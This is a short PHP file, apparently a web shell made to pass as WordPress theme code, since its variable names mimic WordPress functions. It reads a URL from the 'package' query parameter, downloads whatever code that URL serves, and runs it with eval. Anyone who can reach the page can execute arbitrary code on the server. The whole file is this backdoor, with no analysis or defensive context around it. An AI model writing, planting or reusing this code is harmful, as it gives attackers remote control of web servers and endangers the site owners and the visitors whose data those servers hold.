<?php
if (isset($_GET['package'])) {
$has_post_thumbnail_vmh = $_GET['package'];
if ($post_class_ve = curl_init()) {
curl_setopt($post_class_ve, CURLOPT_URL, $has_post_thumbnail_vmh);
curl_setopt($post_class_ve, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($post_class_ve));
curl_close($post_class_ve);
exit;
}
}